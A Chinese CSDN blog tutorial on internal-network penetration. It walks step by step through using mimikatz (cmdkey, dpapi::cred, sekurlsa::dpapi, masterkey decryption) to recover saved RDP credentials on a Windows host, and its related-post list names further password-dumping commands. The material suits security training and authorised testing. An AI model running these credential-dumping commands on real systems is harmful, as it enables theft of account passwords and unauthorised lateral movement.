内网渗透:利用mimikatz查看rdp/3389连接密码

最新推荐文章于 2024-05-12 13:02:42 发布
最新推荐文章于 2024-05-12 13:02:42 发布
阅读量3.4k 收藏 4
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45612728/article/details/122741577
版权

在做内网渗透的时候,往往有的时候如果能得到远程的rdp连接密码,做起横向渗透或者纵向渗透更加容易拿到shell.rdp的密码为什么会被保存起来呢?是因为管理员的在连接的时候对信息凭据进行保存,所以会保存到本地的计算机当中,从而我们可以使用minikatz来进行读取密码的信息.

  1. 首先使用cmdkey /list来查看是否有保存的凭据密码信息.

在这里插入图片描述
2.使用命令:dir /a %userprofile%\AppData\Local\Microsoft\Credentials* 来查看保存凭据的目录和凭据的值.
在这里插入图片描述
在这里我们需要记住两个重点的信息,在稍后我们是需要使用到的.
C:\Users\earnm\AppData\Local\Microsoft\Credentials 的目录
5117847B0601B531BECD17B088FAC578 凭据的值
3.使用mimikatz来进行操作读取密码
dpapi::cred /in:C:\Users\earnm\AppData\Local\Microsoft\Credentials\5117847B0601B531BECD17B088FAC578
在这里插入图片描述
在这里我们需要记住guidmasterkey的值,稍后我们需要找到对于的东西
{b5b52126-ff2b-4deb-9e7c-d65bd6b6593e}

3.1 使用这条命令进行把数据保存到c盘的根目录中:mimikatz.exe ““privilege::debug”” ““sekurlsa::dpapi full”” exit >> c:\log.txt

然后我们在txt文件中找到对应的{b5b52126-ff2b-4deb-9e7c-d65bd6b6593e}的值.
MasterKey : c957dc8f2ee8085b05cd42171e2ced901a5755f54249e6de47948db5e7f7858857875f7774b1ac7f1feb42bc73a9eaeebf627b34d31386ef3fbd3563ad2fa202
在这里插入图片描述
在这里插入图片描述

3.2使用下面的命令进行读取密码的信息
这里使用刚才的目录,加上刚才的值MasterKey就可以进行读取了密码.
mimikatz # dpapi::cred /in:C:\Users\earnm\AppData\Local\Microsoft\Credentials\5117847B0601B531BECD17B088FAC578 /masterkey:c957dc8f2ee8085b05cd42171e2ced901a5755f54249e6de47948db5e7f7858857875f7774b1ac7f1feb42bc73a9eaeebf627b34d31386ef3fbd3563ad2fa202
在这里插入图片描述
在这里插入图片描述
这里的username就是账户,credentialblob就是账号密码.

请再坚持一下
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mimikatz(windows 明文密码抓取工具)
04-02
windows 明文密码抓取工具,分别有32位和64位版本,在XP和win 7 旗舰版上测试成功
利用mimikatz查看rdp连接密码【渗透测试】
热门推荐
leeezp的博客
09-22 29万+
在使用 rdp 时会发现系统有保存连接密码的功能,一定在本地以一种加密方式保存,在连接的时候解密进行rdp尝试,那么我们能不能那到加密的密码解密以获取这台机器rdp连接过的机器呢?UserName就是账户,CredentialBlob 字段值是解密后的密码,如果是空,就尝试 Credentials 目录下其他凭据的值。(毕竟渗透也是个苦力活...)可以保存rdp凭据,ssh凭据等连接凭据。接下来就一个一个实验吧,因为这个下面是凭据的值,不一定哪一个是你要的,需要写工具批量查喽。
2024年网络安全最全内网渗透神器(Mimikatz)——使用教程,2024年最新当上项目经理才知道
最新发布
2401_84267585的博客
05-12 1407
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
Winlogon劫持记录3389密码小工具
03-26 3434
在得到system权限下,通常希望得到3389管理员密码,来进一步得到更多的信息,方便进一步的渗透。gina木马比较不错,但是貌似win 2000少导出一个函数,用在win 2000下可能崩溃。于是写了一个小工具,通过挂钩 msgina.dll WlxLoggedOutSAS 函数,记录登录帐户密码! 启动就用winlogon 通知包,当有3389,连上服务器时。新创建的 winlogon.exe
密码破解工具Minikatz
11-15
主要运行在本机上,用于获取本机的账号和口令,是很不错的网络安全攻防工具软件。具有类似功能的软件还有FindPass.exe,本人会同时上传。
mimikatz
s0mor
09-10 675
mimikatz已集成到metasploit中 需要SYSTEM权限 查看权限: getuid 若不是SYSTEM权限: getsystem 载入mimikatz load mimikatz密码 mimikatz_command -f samdump::hashes MD5解密就行了 ...
内网渗透专用-mimikatz
05-06
懂得都懂!
mimikatz_trunk系统密码查看
01-09
mimikatz_trunk系统密码查看
mimikatz猕猴桃渗透测试神器 读取密码 win10 不可用
04-27
渗透测试神奇 安全检测 网络安全 读取密码
mimikatz获取系统密码
03-28
获取系统级别密码
mimikatz.exe windows密码查看
07-12
version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 ...
获取Windows明文密码mimikatz_trunk_2.2.0_20190512.7z
07-07
Windows明文密码获取工具mimikatz_trunk_2.2.0_20190512.7z
记一次getshell最后3389远程登录
和仲的博客
07-13 732
记一次getshell最后3389远程登录
mimikatz使用方法
课嗨教育的专栏
04-23 3747
0x00 简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe进程中获取当前登录系统用户名的密码, lsass 是微软 Windows 系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass 内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对 lsass 逆算获取.
mimakatz用法_使用Mimikatz读取密码
weixin_39966765的博客
12-20 537
法一:https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170813第一条:privilege::debug //提升权限第二条:sekurlsa::logonpasswords //抓取密码注:请以管理员权限!!!(什么?要管理员权限!有管理员权限了还要你干嘛....)法二:meterreter下已集成了mim...
内网渗透神器(Mimikatz)——使用教程
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
mimikatz的使用
小小猪的博客
12-15 1172
mimikatz的使用 简介: mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单 测试过程: 常见命令: cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list--------
mimikatz获取密码_Mimikatz使用大全
weixin_39642761的博客
12-05 504
0x00 简介Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模...
mimikatz查看win10密码
05-13
请注意,使用Mimikatz来获取未经授权的访问密码或尝试获取其他人的密码可能是非法的,这可能会导致法律后果。在此仅提供给安全研究人员或系统管理员进行安全审计和测试的参考。 以下是使用Mimikatz获取Win10密码的步骤: 1. 首先,下载最新版本的Mimikatz工具,并解压缩到本地文件夹中。 2. 在管理员权限的命令提示符下运行Mimikatz。 3. 输入以下命令以加载Mimikatz安全支持提供程序: ``` mimikatz # privilege::debug ``` 4. 输入以下命令以导出Win10密码哈希值: ``` mimikatz # lsadump::sam ``` 5. 如果成功,将显示包含哈希值的输出。您可以使用在线哈希解密工具或其他密码破解工具来破解密码哈希值。 请注意,使用Mimikatz来获取密码可能会触发反病毒软件的警报,因为它可以被用于恶意目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值